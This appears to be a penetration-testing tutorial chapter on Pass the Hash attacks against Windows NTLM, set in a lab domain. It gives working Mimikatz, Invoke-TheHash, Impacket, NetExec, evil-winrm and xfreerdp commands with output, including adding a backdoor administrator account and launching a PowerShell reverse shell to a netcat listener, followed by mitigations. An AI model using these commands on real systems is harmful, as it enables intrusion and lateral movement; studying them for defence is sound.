Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

Pass the Hash (PtH) Attacks

A Pass the Hash (PtH) attack is a technique where an attacker uses a password hash instead of the plain text password for authentication. The attacker doesn’t need to decrypt the hash to obtain a plaintext password. PtH attacks exploit the authentication protocol, as the password hash is not salted and remains static for every session until the password is changed.

Prerequisites

The attacker must have administrative privileges or particular privileges on the target machine to obtain a password hash. Hashes can be obtained in several ways, including:

  • Dumping the local SAM database from a compromised host
  • Extracting hashes from the NTDS database (ntds.dit) on a Domain Controller
  • Pulling the hashes from memory (lsass.exe)

Windows NTLM Background

Microsoft’s Windows New Technology LAN Manager (NTLM) is a set of security protocols that authenticates users’ identities while also protecting the integrity and confidentiality of their data. NTLM is a single sign-on (SSO) solution that uses a challenge-response protocol to verify the user’s identity without having them provide a password.

Despite its known flaws, NTLM is still commonly used to ensure compatibility with legacy clients and servers, even on modern systems. While Microsoft continues to support NTLM, Kerberos has taken over as the default authentication mechanism in Windows 2000 and subsequent Active Directory (AD) domains.

With NTLM, passwords stored on the server and domain controller are not “salted,” which means that an adversary with a password hash can authenticate a session without knowing the original password. This is what makes Pass the Hash attacks possible.

Pass the Hash from Windows

Using Mimikatz

Mimikatz has a module named sekurlsa::pth that allows us to perform a Pass the Hash attack by starting a process using the hash of the user’s password.

Required Parameters:

  • /user - The user name we want to impersonate
  • /rc4 or /NTLM - NTLM hash of the user’s password
  • /domain - Domain the user belongs to. For local accounts, use the computer name, localhost, or a dot (.)
  • /run - The program to run with the user’s context (defaults to cmd.exe)
c:\tools> mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit

user    : julio
domain  : inlanefreight.htb
program : cmd.exe
impers. : no
NTLM    : 64F12CDDAA88057E06A81B54E73B949B
  |  PID  8404
  |  TID  4268
  |  LSA Process was already R/W
  |  LUID 0 ; 5218172 (00000000:004f9f7c)
  \_ msv1_0   - data copy @ 0000028FC91AB510 : OK !
  \_ kerberos - data copy @ 0000028FC964F288
   \_ des_cbc_md4       -> null
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ *Password replace @ 0000028FC9673AE8 (32) -> null

Now you can use the spawned cmd.exe to execute commands in the user’s context.

Using Invoke-TheHash (PowerShell)

Invoke-TheHash is a collection of PowerShell functions for performing Pass the Hash attacks with WMI and SMB. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol.

Note: Local administrator privileges are not required client-side, but the user and hash we use to authenticate need to have administrative rights on the target computer.

Required Parameters:

  • Target - Hostname or IP address of the target
  • Username - Username to use for authentication
  • Domain - Domain to use for authentication (unnecessary with local accounts or when using @domain after the username)
  • Hash - NTLM password hash for authentication (accepts LM:NTLM or NTLM format)
  • Command - Command to execute on the target

SMB Execution Example

Create a new user and add to Administrators group:

PS c:\tools\Invoke-TheHash> Import-Module .\Invoke-TheHash.psd1
PS c:\tools\Invoke-TheHash> Invoke-SMBExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose

VERBOSE: [+] inlanefreight.htb\julio successfully authenticated on 172.16.1.10
VERBOSE: inlanefreight.htb\julio has Service Control Manager write privilege on 172.16.1.10
VERBOSE: Service EGDKNNLQVOLFHRQTQMAU created on 172.16.1.10
VERBOSE: [*] Trying to execute command on 172.16.1.10
[+] Command executed with service EGDKNNLQVOLFHRQTQMAU on 172.16.1.10
VERBOSE: Service EGDKNNLQVOLFHRQTQMAU deleted on 172.16.1.10

WMI Execution Example (Reverse Shell)

First, start a netcat listener:

PS C:\tools> .\nc.exe -lvnp 8001
listening on [any] 8001 ...

Generate a PowerShell reverse shell payload (e.g., using https://revshells.com with PowerShell #3 Base64 option), then execute:

PS c:\tools\Invoke-TheHash> Import-Module .\Invoke-TheHash.psd1
PS c:\tools\Invoke-TheHash> Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e <BASE64_ENCODED_PAYLOAD>"

Pass the Hash from Linux

Using Impacket

Impacket has several tools that support authentication via Pass the Hash, including:

  • impacket-psexec
  • impacket-wmiexec
  • impacket-atexec
  • impacket-smbexec

PsExec Example

$ impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.129.201.126.....
[*] Found writable share ADMIN$
[*] Uploading file SLUBMRXK.exe
[*] Opening SVCManager on 10.129.201.126.....
[*] Creating service BnEU on 10.129.201.126.....
[*] Starting service BnEU.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19041.1415]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Using NetExec

NetExec (formerly CrackMapExec) can execute commands using Pass the Hash.

$ netexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami

SMB         10.129.201.126  445    MS01            [*] Windows 10 Enterprise 10240 x64 (name:MS01) (domain:.) (signing:False) (SMBv1:True)
SMB         10.129.201.126  445    MS01            [+] .\Administrator 30B3783CE2ABF1AF70F77D0660CF3453 (Pwn3d!)
SMB         10.129.201.126  445    MS01            [+] Executed command 
SMB         10.129.201.126  445    MS01            MS01\administrator

Using evil-winrm

Evil-WinRM can authenticate using Pass the Hash with PowerShell remoting. Useful if SMB is blocked or you don’t have administrative rights.

$ evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>

Note: When using a domain account, include the domain name: administrator@inlanefreight.htb

Using RDP with xfreerdp

RDP PtH attacks can gain GUI access to the target system.

Caveats:

  • Restricted Admin Mode must be enabled on the target (disabled by default)

Enable Restricted Admin Mode

On the target, add the registry key:

c:\tools> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Connect via RDP

$ xfreerdp /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B

UAC Limitations for Local Accounts

UAC (User Account Control) limits local users’ ability to perform remote administration operations.

LocalAccountTokenFilterPolicy

When HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy is set to:

  • 0 - Only the built-in local admin account (RID-500, “Administrator”) can perform remote administration tasks
  • 1 - Other local admins are also allowed

FilterAdministratorToken

If the registry key FilterAdministratorToken (disabled by default) is enabled (value 1), the RID 500 account is enrolled in UAC protection. This means remote PtH will fail against the machine when using that account.

Important: These settings only apply to local administrative accounts. Domain accounts with administrative rights on a computer can still use Pass the Hash.

Mitigations

  • Limit use of local administrator accounts
  • Use unique passwords for local administrator accounts across machines
  • Enable Protected Users group membership for sensitive accounts
  • Implement Credential Guard
  • Monitor for PtH indicators (e.g., NTLM authentication events, unusual logon patterns)
  • Regularly rotate privileged account passwords

References